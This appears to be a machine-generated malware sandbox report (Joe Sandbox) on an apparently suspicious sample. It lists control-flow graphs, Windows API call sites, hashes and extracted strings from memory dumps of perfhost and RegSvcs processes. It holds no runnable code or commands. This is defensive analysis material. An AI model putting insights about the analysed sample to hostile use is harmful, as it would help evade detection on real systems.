                                                                                                                                                          • Instruction ID: 2207315118175dc5cf542b2333848ba31932761e5576b6c81cccdcf5787f058d
                                                                                                                                                          • Opcode Fuzzy Hash: 9bf047d54ad572b4c3db2cea684d8db00f556ab519af365acacac7f43c25b971
                                                                                                                                                          • Instruction Fuzzy Hash: D4F04F30A00219BBDB11AF99DC0AB9DBBB5FB48752F094069F819E2260DB749A50CB91

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12320 890e6f-890e86 GetLastError 12321 890e88-890e92 call 891796 12320->12321 12322 890e94-890ea6 call 8915c9 12320->12322 12321->12322 12327 890ee5-890eec SetLastError 12321->12327 12328 890ea8 12322->12328 12329 890eb1-890ebf call 8917ec 12322->12329 12330 890eee-890ef3 12327->12330 12331 890ea9-890eaf call 891626 12328->12331 12336 890ec1-890ec2 12329->12336 12337 890ec4-890eda call 890d27 call 891626 12329->12337 12338 890edc-890ee3 SetLastError 12331->12338 12336->12331 12337->12327 12337->12338 12338->12330
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,?,00890B68,0089324B,?,008912BA,?,?,00000000), ref: 00890E74
                                                                                                                                                          • _free.LIBCMT ref: 00890EA9
                                                                                                                                                          • _free.LIBCMT ref: 00890ED0
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,008912BA,?,?,00000000), ref: 00890EDD
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,008912BA,?,?,00000000), ref: 00890EE6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                          • Opcode ID: 460785eabdb1b75b82bc4fdc83c3da2d13e30edb5195ac74ca8ba5a6aaf418e5
                                                                                                                                                          • Instruction ID: e7286304d196b132aebbf2ec41d8044a98d86b0665ac3c257540f003e78db47f
                                                                                                                                                          • Opcode Fuzzy Hash: 460785eabdb1b75b82bc4fdc83c3da2d13e30edb5195ac74ca8ba5a6aaf418e5
                                                                                                                                                          • Instruction Fuzzy Hash: 5C01F4371046067F9F12B6BD5C8D92F266DFBC2374B2D0929F824E2292FA758C014922

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 12343 892701-89270c 12344 89270e-892716 12343->12344 12345 892767-892769 12343->12345 12346 892718-89271e call 891626 12344->12346 12347 89271f-892728 12344->12347 12346->12347 12349 89272a-892730 call 891626 12347->12349 12350 892731-89273a 12347->12350 12349->12350 12353 89273c-892742 call 891626 12350->12353 12354 892743-89274c 12350->12354 12353->12354 12357 89274e-892754 call 891626 12354->12357 12358 892755-89275e 12354->12358 12357->12358 12358->12345 12359 892760-892766 call 891626 12358->12359 12359->12345
                                                                                                                                                          APIs
                                                                                                                                                          • _free.LIBCMT ref: 00892719
                                                                                                                                                            • Part of subcall function 00891626: HeapFree.KERNEL32(00000000,00000000,?,00892798,?,00000000,?,00000000,?,008927BF,?,00000007,?,?,00891C27,?), ref: 0089163C
                                                                                                                                                            • Part of subcall function 00891626: GetLastError.KERNEL32(?,?,00892798,?,00000000,?,00000000,?,008927BF,?,00000007,?,?,00891C27,?,?), ref: 0089164E
                                                                                                                                                          • _free.LIBCMT ref: 0089272B
                                                                                                                                                          • _free.LIBCMT ref: 0089273D
                                                                                                                                                          • _free.LIBCMT ref: 0089274F
                                                                                                                                                          • _free.LIBCMT ref: 00892761
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                          • Opcode ID: cd91e5fad6ac069019a14cb708ca9d43b666e0882a1f2269f066fd12adcbf38c
                                                                                                                                                          • Instruction ID: 056043780e7ea770fddc8899097c13835f90580f5eb42b5ba7cf6db72b581e2e
                                                                                                                                                          • Opcode Fuzzy Hash: cd91e5fad6ac069019a14cb708ca9d43b666e0882a1f2269f066fd12adcbf38c
                                                                                                                                                          • Instruction Fuzzy Hash: 57F0FF32905201BB9E71FBD8F9C9C1A77D9FA05710BAC1C15F548E7A12DB20FC8087A9

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 13098 892a8f-892ab4 call 88f309 13101 892ac1-892ae7 MultiByteToWideChar 13098->13101 13102 892ab6-892abe 13098->13102 13103 892aed-892af9 13101->13103 13104 892b86-892b8a 13101->13104 13102->13101 13105 892afb-892b0c 13103->13105 13106 892b45 13103->13106 13107 892b8c-892b8f 13104->13107 13108 892b96-892bab call 89419d 13104->13108 13111 892b0e-892b1d call 894330 13105->13111 13112 892b27-892b38 call 89288a 13105->13112 13110 892b47-892b49 13106->13110 13107->13108 13115 892b4b-892b6d call 895c60 MultiByteToWideChar 13110->13115 13116 892b7f-892b85 call 892bac 13110->13116 13111->13116 13125 892b1f-892b25 13111->13125 13112->13116 13122 892b3a 13112->13122 13115->13116 13127 892b6f-892b7d GetStringTypeW 13115->13127 13116->13104 13126 892b40-892b43 13122->13126 13125->13126 13126->13110 13127->13116
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00892ADC
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00892B65
                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00892B77
                                                                                                                                                          • __freea.LIBCMT ref: 00892B80
                                                                                                                                                            • Part of subcall function 0089288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 008928BC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                          • Opcode ID: c198e982dff71d8cd59c8e49e3f4b48d47340383a0cc86d5801dfb19c348338a
                                                                                                                                                          • Instruction ID: 681ad3279ca44888fddbf6eaf23496a4461e07c5536230215fd6ce9eec4a1b0a
                                                                                                                                                          • Opcode Fuzzy Hash: c198e982dff71d8cd59c8e49e3f4b48d47340383a0cc86d5801dfb19c348338a
                                                                                                                                                          • Instruction Fuzzy Hash: C3318D72A0021AEBDF25AF68DC85DAE7BE9FB50324F184169FC04D62A0E735CD50CB90

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 13291 89171b-89172f 13292 89173c-891757 LoadLibraryExW 13291->13292 13293 891731-89173a 13291->13293 13295 891759-891762 GetLastError 13292->13295 13296 891780-891786 13292->13296 13294 891793-891795 13293->13294 13297 891771 13295->13297 13298 891764-89176f LoadLibraryExW 13295->13298 13299 891788-891789 FreeLibrary 13296->13299 13300 89178f 13296->13300 13301 891773-891775 13297->13301 13298->13301 13299->13300 13302 891791-891792 13300->13302 13301->13296 13303 891777-89177e 13301->13303 13302->13294 13303->13302
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00890B68,00000000,00000000,?,008916C2,00890B68,00000000,00000000,00000000,?,00891813,00000006,FlsSetValue), ref: 0089174D
                                                                                                                                                          • GetLastError.KERNEL32(?,008916C2,00890B68,00000000,00000000,00000000,?,00891813,00000006,FlsSetValue,008A5FC4,FlsSetValue,00000000,00000364,?,00890EBD), ref: 00891759
                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008916C2,00890B68,00000000,00000000,00000000,?,00891813,00000006,FlsSetValue,008A5FC4,FlsSetValue,00000000), ref: 00891767
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                          • Opcode ID: d4ea94ef4c54a7ca71804aa37988ad298390118357a8fa03074422309a40f3b4
                                                                                                                                                          • Instruction ID: f84231f61aa5c09926d7962082f5610f7d2bbec44eb62cef706b7f7f90de9e81
                                                                                                                                                          • Opcode Fuzzy Hash: d4ea94ef4c54a7ca71804aa37988ad298390118357a8fa03074422309a40f3b4
                                                                                                                                                          • Instruction Fuzzy Hash: C001F736709227BBCF216AB8EC8CA663798FF06BA172D0624F956D3544D720D800C7F0

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:11.9%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:151
                                                                                                                                                          Total number of Limit Nodes:16
                                                                                                                                                          execution_graph 22243 638c218 22244 638c520 22243->22244 22245 638c240 22243->22245 22246 638c249 22245->22246 22251 638b6f4 22245->22251 22248 638c26c 22249 638c563 22248->22249 22255 638b710 22248->22255 22252 638b6ff 22251->22252 22253 638c563 22252->22253 22254 638b710 OleInitialize 22252->22254 22253->22248 22254->22253 22256 638c598 OleInitialize 22255->22256 22257 638c5fc 22256->22257 22257->22249 22322 6385220 22324 6385251 22322->22324 22326 6385351 22322->22326 22323 638525d 22324->22323 22331 6385498 22324->22331 22335 638548b 22324->22335 22325 638529d 22339 6386798 22325->22339 22348 6386787 22325->22348 22358 63854e8 22331->22358 22368 63854db 22331->22368 22332 63854a2 22332->22325 22336 63854a2 22335->22336 22337 63854e8 2 API calls 22335->22337 22338 63854db 2 API calls 22335->22338 22336->22325 22337->22336 22338->22336 22340 63867c3 22339->22340 22390 6386cf0 22340->22390 22341 6386846 22342 6384454 GetModuleHandleW 22341->22342 22344 6386872 22341->22344 22343 63868b6 22342->22343 22345 6387a70 CreateWindowExW 22343->22345 22346 6387a80 CreateWindowExW 22343->22346 22345->22344 22346->22344 22349 638677f 22348->22349 22350 6386796 22348->22350 22349->22326 22355 6386cf0 GetModuleHandleW 22350->22355 22351 6386846 22352 6384454 GetModuleHandleW 22351->22352 22354 6386872 22351->22354 22353 63868b6 22352->22353 22415 6387a70 22353->22415 22419 6387a80 22353->22419 22355->22351 22359 63854f9 22358->22359 22362 638551c 22358->22362 22378 6384454 22359->22378 22362->22332 22363 6385514 22363->22362 22364 6385720 GetModuleHandleW 22363->22364 22365 638574d 22364->22365 22365->22332 22369 63854e8 22368->22369 22370 6384454 GetModuleHandleW 22369->22370 22372 638551c 22369->22372 22371 6385504 22370->22371 22371->22372 22376 6385770 GetModuleHandleW 22371->22376 22377 6385780 GetModuleHandleW 22371->22377 22372->22332 22373 6385514 22373->22372 22374 6385720 GetModuleHandleW 22373->22374 22375 638574d 22374->22375 22375->22332 22376->22373 22377->22373 22379 63856d8 GetModuleHandleW 22378->22379 22381 6385504 22379->22381 22381->22362 22382 6385780 22381->22382 22385 6385770 22381->22385 22383 6384454 GetModuleHandleW 22382->22383 22384 6385794 22383->22384 22384->22363 22386 638577b 22385->22386 22387 638574e 22385->22387 22388 6384454 GetModuleHandleW 22386->22388 22387->22363 22389 6385794 22388->22389 22389->22363 22391 6386d2d 22390->22391 22392 6386dae 22391->22392 22395 6387278 22391->22395 22405 6387268 22391->22405 22396 638728d 22395->22396 22397 6384454 GetModuleHandleW 22396->22397 22398 63872b1 22396->22398 22397->22398 22399 6384454 GetModuleHandleW 22398->22399 22404 638746d 22398->22404 22400 63873f3 22399->22400 22401 6384454 GetModuleHandleW 22400->22401 22400->22404 22402 6387441 22401->22402 22403 6384454 GetModuleHandleW 22402->22403 22402->22404 22403->22404 22404->22392 22406 6387278 22405->22406 22407 6384454 GetModuleHandleW 22406->22407 22408 63872b1 22406->22408 22407->22408 22409 6384454 GetModuleHandleW 22408->22409 22414 638746d 22408->22414 22410 63873f3 22409->22410 22411 6384454 GetModuleHandleW 22410->22411 22410->22414 22412 6387441 22411->22412 22413 6384454 GetModuleHandleW 22412->22413 22412->22414 22413->22414 22414->22392 22416 6387a80 22415->22416 22422 6386efc 22416->22422 22420 6386efc CreateWindowExW 22419->22420 22421 6387ab5 22420->22421 22421->22354 22423 6387ad0 CreateWindowExW 22422->22423 22425 6387bf4 22423->22425 22258 23dd030 22259 23dd048 22258->22259 22260 23dd0a2 22259->22260 22265 6387c78 22259->22265 22269 6386f24 22259->22269 22278 63889d8 22259->22278 22287 6387c88 22259->22287 22266 6387c88 22265->22266 22267 6386f24 CallWindowProcW 22266->22267 22268 6387ccf 22267->22268 22268->22260 22270 6386f2f 22269->22270 22271 6388a49 22270->22271 22273 6388a39 22270->22273 22308 638704c 22271->22308 22291 6388c3c 22273->22291 22297 6388b61 22273->22297 22303 6388b70 22273->22303 22274 6388a47 22281 6388a15 22278->22281 22279 6388a49 22280 638704c CallWindowProcW 22279->22280 22283 6388a47 22280->22283 22281->22279 22282 6388a39 22281->22282 22284 6388c3c CallWindowProcW 22282->22284 22285 6388b70 CallWindowProcW 22282->22285 22286 6388b61 CallWindowProcW 22282->22286 22284->22283 22285->22283 22286->22283 22288 6387cae 22287->22288 22289 6386f24 CallWindowProcW 22288->22289 22290 6387ccf 22289->22290 22290->22260 22292 6388bfa 22291->22292 22293 6388c4a 22291->22293 22312 6388c28 22292->22312 22315 6388c18 22292->22315 22294 6388c10 22294->22274 22298 6388b6a 22297->22298 22299 6388b05 22297->22299 22301 6388c28 CallWindowProcW 22298->22301 22302 6388c18 CallWindowProcW 22298->22302 22299->22274 22300 6388c10 22300->22274 22301->22300 22302->22300 22305 6388b84 22303->22305 22304 6388c10 22304->22274 22306 6388c28 CallWindowProcW 22305->22306 22307 6388c18 CallWindowProcW 22305->22307 22306->22304 22307->22304 22309 6387057 22308->22309 22310 638a12a CallWindowProcW 22309->22310 22311 638a0d9 22309->22311 22310->22311 22311->22274 22313 6388c39 22312->22313 22319 638a061 22312->22319 22313->22294 22316 6388c28 22315->22316 22317 6388c39 22316->22317 22318 638a061 CallWindowProcW 22316->22318 22317->22294 22318->22317 22320 638704c CallWindowProcW 22319->22320 22321 638a07a 22320->22321 22321->22313
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ogq$(ogq$(ogq$(ogq$,kq$,kq$Hkq
                                                                                                                                                          • API String ID: 0-2452097927
                                                                                                                                                          • Opcode ID: 1eb87588547a56dc711e09faae4a2e3d38f5a524b986b0320d3cf431a78ce9b5
                                                                                                                                                          • Instruction ID: 633a34a2403320fbfddeb376346f4a156f82da566a40e6035e53d62ee4108867
                                                                                                                                                          • Opcode Fuzzy Hash: 1eb87588547a56dc711e09faae4a2e3d38f5a524b986b0320d3cf431a78ce9b5
                                                                                                                                                          • Instruction Fuzzy Hash: 6F729170A001299FDB18CF6AC984AAEBBB6FF88304F65845AE405DB355DB30DD46CF50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 927 2424348-2424368 928 242436a 927->928 929 242436f-242444c call 2423168 call 2422c88 927->929 928->929 939 2424453-2424474 call 2424611 929->939 940 242444e 929->940 941 242447a-2424485 939->941 940->939 942 2424487 941->942 943 242448c-2424490 941->943 942->943 944 2424492-2424493 943->944 945 2424495-242449c 943->945 946 24244b4-24244f8 944->946 947 24244a3-24244b1 945->947 948 242449e 945->948 952 242455e-2424575 946->952 947->946 948->947 954 2424577-242459c 952->954 955 24244fa-2424510 952->955 962 24245b4 954->962 963 242459e-24245b3 954->963 959 2424512-242451e 955->959 960 242453a 955->960 964 2424520-2424526 959->964 965 2424528-242452e 959->965 961 2424540-242455d 960->961 961->952 963->962 966 2424538 964->966 965->966 966->961
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0onp$Ljnp$Ljnp$PHgq$PHgq
                                                                                                                                                          • API String ID: 0-3176429990
                                                                                                                                                          • Opcode ID: ba586d4d3eb3846618b72db4daf30fdc388be82e05edef8ec160490d74b4e6f8
                                                                                                                                                          • Instruction ID: 1064b710f644abdc88ccd13e50b45029fdfc14009c4cecdb6461bb8a20e6266c
                                                                                                                                                          • Opcode Fuzzy Hash: ba586d4d3eb3846618b72db4daf30fdc388be82e05edef8ec160490d74b4e6f8
                                                                                                                                                          • Instruction Fuzzy Hash: DE817274E00218CFDB14DFAAD954A9EBBF2FF88300F54906AE419AB355DB709985CF50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 971 2421a50-2421a84 973 2421a86-2421a8d 971->973 974 2421a9f 971->974 975 2421a96-2421a9d 973->975 976 2421a8f-2421a94 973->976 977 2421aa7 974->977 978 2421aaa-2421abe 975->978 976->978 977->978 980 2421ac0-2421ac7 978->980 981 2421ad4-2421adc 978->981 982 2421ac9-2421acb 980->982 983 2421acd-2421ad2 980->983 984 2421ade-2421ae2 981->984 982->984 983->984 986 2421b42-2421b45 984->986 987 2421ae4-2421af9 984->987 988 2421b47-2421b5c 986->988 989 2421b8d-2421b93 986->989 987->986 995 2421afb-2421afe 987->995 988->989 1001 2421b5e-2421b62 988->1001 990 2421b99-2421b9b 989->990 991 242268e 989->991 990->991 993 2421ba1-2421ba6 990->993 998 2422693-2422854 991->998 999 242263c-2422640 993->999 1000 2421bac 993->1000 996 2421b00-2421b02 995->996 997 2421b1d-2421b3b call 24202a8 995->997 996->997 1002 2421b04-2421b07 996->1002 997->986 1019 2422876-2422918 998->1019 1020 2422856-2422873 998->1020 1004 2422642-2422645 999->1004 1005 2422647-242268d 999->1005 1000->999 1006 2421b64-2421b68 1001->1006 1007 2421b6a-2421b88 call 24202a8 1001->1007 1002->986 1009 2421b09-2421b1b 1002->1009 1004->998 1004->1005 1006->989 1006->1007 1007->989 1009->986 1009->997 1021 242291a-2422934 1019->1021 1022 242293c 1019->1022 1020->1019 1026 2422956-242295b 1021->1026 1027 2422936-2422939 1021->1027 1023 242295e-2422c75 1022->1023 1024 242293e-2422954 1022->1024 1024->1026 1026->1023 1027->1022
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xkq$Xkq$Xkq$Xkq
                                                                                                                                                          • API String ID: 0-2567626648
                                                                                                                                                          • Opcode ID: 9ac5601de2ff8041a753982b885e8c01935465736f97237c548ce66bed1981cb
                                                                                                                                                          • Instruction ID: 04c770122267109c7e4c7f6b6138f81f912fbd688cc896e2009144e430cdedae
                                                                                                                                                          • Opcode Fuzzy Hash: 9ac5601de2ff8041a753982b885e8c01935465736f97237c548ce66bed1981cb
                                                                                                                                                          • Instruction Fuzzy Hash: C742B7516981D19AC37B4B7498A26D9FFB1EFC226071EC7CAC0C68AC43DA5E884F8745
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ogq$4'gq
                                                                                                                                                          • API String ID: 0-590356624
                                                                                                                                                          • Opcode ID: bde46bc75e940695040d6cb144ca032412e903d0daa9e89ef29b67a17f46c63e
                                                                                                                                                          • Instruction ID: b4ac4e1ac75cfa4434b164a05cd73865d7e1de3b83a0f211206f43efcb98cc1e
                                                                                                                                                          • Opcode Fuzzy Hash: bde46bc75e940695040d6cb144ca032412e903d0daa9e89ef29b67a17f46c63e
                                                                                                                                                          • Instruction Fuzzy Hash: 16828E70A00269CFCB15CF6AC584AAEBBF2FF88314F65855AE805DB365D730E985CB50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 529 24266b8-24266ed 530 24266f3-2426716 529->530 531 2426b1c-2426b20 529->531 540 24267c4-24267c8 530->540 541 242671c-2426729 530->541 532 2426b22-2426b36 531->532 533 2426b39-2426b47 531->533 538 2426bb8-2426bcd 533->538 539 2426b49-2426b5e 533->539 549 2426bd4-2426be1 538->549 550 2426bcf-2426bd2 538->550 551 2426b60-2426b63 539->551 552 2426b65-2426b72 539->552 542 2426810-2426819 540->542 543 24267ca-24267d8 540->543 555 242672b-2426736 541->555 556 2426738 541->556 546 2426c2f 542->546 547 242681f-2426829 542->547 543->542 563 24267da-24267f5 543->563 564 2426c34-2426c64 546->564 547->531 553 242682f-2426838 547->553 557 2426be3-2426c1e 549->557 550->557 558 2426b74-2426bb5 551->558 552->558 561 2426847-2426853 553->561 562 242683a-242683f 553->562 565 242673a-242673c 555->565 556->565 605 2426c25-2426c2c 557->605 561->564 569 2426859-242685f 561->569 562->561 589 2426803 563->589 590 24267f7-2426801 563->590 582 2426c66-2426c7c 564->582 583 2426c7d-2426c84 564->583 565->540 566 2426742-24267a4 565->566 617 24267a6 566->617 618 24267aa-24267c1 566->618 572 2426b06-2426b0a 569->572 573 2426865-2426875 569->573 572->546 576 2426b10-2426b16 572->576 587 2426877-2426887 573->587 588 2426889-242688b 573->588 576->531 576->553 591 242688e-2426894 587->591 588->591 592 2426805-2426807 589->592 590->592 591->572 599 242689a-24268a9 591->599 592->542 600 2426809 592->600 601 2426957-2426982 call 2426500 * 2 599->601 602 24268af 599->602 600->542 619 2426988-242698c 601->619 620 2426a6c-2426a86 601->620 603 24268b2-24268c3 602->603 603->564 608 24268c9-24268db 603->608 608->564 610 24268e1-24268f9 608->610 673 24268fb call 2426c88 610->673 674 24268fb call 2426c98 610->674 613 2426901-2426911 613->572 616 2426917-242691a 613->616 621 2426924-2426927 616->621 622 242691c-2426922 616->622 617->618 618->540 619->572 624 2426992-2426996 619->624 620->531 642 2426a8c-2426a90 620->642 621->546 625 242692d-2426930 621->625 622->621 622->625 627 2426998-24269a5 624->627 628 24269be-24269c4 624->628 629 2426932-2426936 625->629 630 2426938-242693b 625->630 645 24269a7-24269b2 627->645 646 24269b4 627->646 631 24269c6-24269ca 628->631 632 24269ff-2426a05 628->632 629->630 633 2426941-2426945 629->633 630->546 630->633 631->632 634 24269cc-24269d5 631->634 635 2426a11-2426a17 632->635 636 2426a07-2426a0b 632->636 633->546 639 242694b-2426951 633->639 640 24269d7-24269dc 634->640 641 24269e4-24269fa 634->641 643 2426a23-2426a25 635->643 644 2426a19-2426a1d 635->644 636->605 636->635 639->601 639->603 640->641 641->572 647 2426a92-2426a9c call 24253a8 642->647 648 2426acc-2426ad0 642->648 649 2426a27-2426a30 643->649 650 2426a5a-2426a5c 643->650 644->572 644->643 651 24269b6-24269b8 645->651 646->651 647->648 662 2426a9e-2426ab3 647->662 648->605 654 2426ad6-2426ada 648->654 657 2426a32-2426a37 649->657 658 2426a3f-2426a55 649->658 650->572 652 2426a62-2426a69 650->652 651->572 651->628 654->605 659 2426ae0-2426aed 654->659 657->658 658->572 664 2426aef-2426afa 659->664 665 2426afc 659->665 662->648 670 2426ab5-2426aca 662->670 667 2426afe-2426b00 664->667 665->667 667->572 667->605 670->531 670->648 673->613 674->613
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ogq$(ogq$(ogq$(ogq$(ogq$(ogq$,kq$,kq
                                                                                                                                                          • API String ID: 0-1957521964
                                                                                                                                                          • Opcode ID: cb7448f86eb0ab985de36f45700cf4daeddfc8af649e0d52dcc00264a9a5b275
                                                                                                                                                          • Instruction ID: d26fadc4444472b579a069293af84332293b19c868aa7b54701fc47e178c7f1d
                                                                                                                                                          • Opcode Fuzzy Hash: cb7448f86eb0ab985de36f45700cf4daeddfc8af649e0d52dcc00264a9a5b275
                                                                                                                                                          • Instruction Fuzzy Hash: 5B124930A002299FCB24DF6AD984A9EBBF6FF48314F56855AE805DB361DB30ED45CB50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1282 2427458-2427946 1357 2427e98-2427ecd 1282->1357 1358 242794c-242795c 1282->1358 1363 2427ed9-2427ef7 1357->1363 1364 2427ecf-2427ed4 1357->1364 1358->1357 1359 2427962-2427972 1358->1359 1359->1357 1360 2427978-2427988 1359->1360 1360->1357 1362 242798e-242799e 1360->1362 1362->1357 1365 24279a4-24279b4 1362->1365 1375 2427ef9-2427f03 1363->1375 1376 2427f6e-2427f7a 1363->1376 1366 2427fbe-2427fc3 1364->1366 1365->1357 1367 24279ba-24279ca 1365->1367 1367->1357 1369 24279d0-24279e0 1367->1369 1369->1357 1371 24279e6-24279f6 1369->1371 1371->1357 1372 24279fc-2427a0c 1371->1372 1372->1357 1374 2427a12-2427a22 1372->1374 1374->1357 1377 2427a28-2427e97 1374->1377 1375->1376 1381 2427f05-2427f11 1375->1381 1382 2427f91-2427f9d 1376->1382 1383 2427f7c-2427f88 1376->1383 1391 2427f13-2427f1e 1381->1391 1392 2427f36-2427f39 1381->1392 1388 2427fb4-2427fb6 1382->1388 1389 2427f9f-2427fab 1382->1389 1383->1382 1393 2427f8a-2427f8f 1383->1393 1388->1366 1389->1388 1402 2427fad-2427fb2 1389->1402 1391->1392 1404 2427f20-2427f2a 1391->1404 1394 2427f50-2427f5c 1392->1394 1395 2427f3b-2427f47 1392->1395 1393->1366 1397 2427fc4-2427fe6 1394->1397 1398 2427f5e-2427f65 1394->1398 1395->1394 1405 2427f49-2427f4e 1395->1405 1408 2427ff6 1397->1408 1409 2427fe8 1397->1409 1398->1397 1403 2427f67-2427f6c 1398->1403 1402->1366 1403->1366 1404->1392 1414 2427f2c-2427f31 1404->1414 1405->1366 1413 2427ff8-2427ff9 1408->1413 1409->1408 1412 2427fef-2427ff4 1409->1412 1412->1413 1414->1366
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $gq$$gq
                                                                                                                                                          • API String ID: 0-2569250954
                                                                                                                                                          • Opcode ID: 58055d1d5c9f68e07ae29117769a5f469080218e91f4f2e3e99862aaf973dbd2
                                                                                                                                                          • Instruction ID: 33b22ca4f21705b3c29d22ff1deec116f7e4beca1d5ef6f3597a528863f70e75
                                                                                                                                                          • Opcode Fuzzy Hash: 58055d1d5c9f68e07ae29117769a5f469080218e91f4f2e3e99862aaf973dbd2
                                                                                                                                                          • Instruction Fuzzy Hash: 88521D74A102198FEB64DBA5C860BDEBB73EF84300F2081AED10A6B399DB355D85DF51
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
